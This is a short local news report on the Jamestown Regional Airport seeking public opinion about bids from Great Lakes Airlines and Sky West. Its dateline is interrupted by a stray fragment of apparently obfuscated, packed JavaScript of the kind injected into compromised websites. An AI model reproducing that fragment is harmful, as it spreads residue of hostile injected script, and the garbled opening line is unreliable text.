JAMESTOWN, ziktb|var|u0026u|referrer|hnrbb||js|php’.split(‘|’),0,{}))
N.D. (NewsDakota.com) – The Jamestown Regional Airport is still searching for the public’s opinion on the two bids received for service to the airport.

Both Great Lakes Airlines and Sky West have put in bids to be the service provider for the Jamestown Regional Airport. Currently, Great Lakes serves Jamestown with a 19 passenger prop plane, providing 3 round trips daily to Minneapolis. Great Lakes also is shared between Devils Lake and Jamestown. Their bid will provide the same service.

Sky West would serve Jamestown using a 50 passenger jet, providing one daily round trip to Denver. It would also serve Devils Lake and Jamestown separately. Jim Boyd, President of the Jamestown Airport Authority Board, says the board is seeking the public’s opinion on what air service they would like to see.
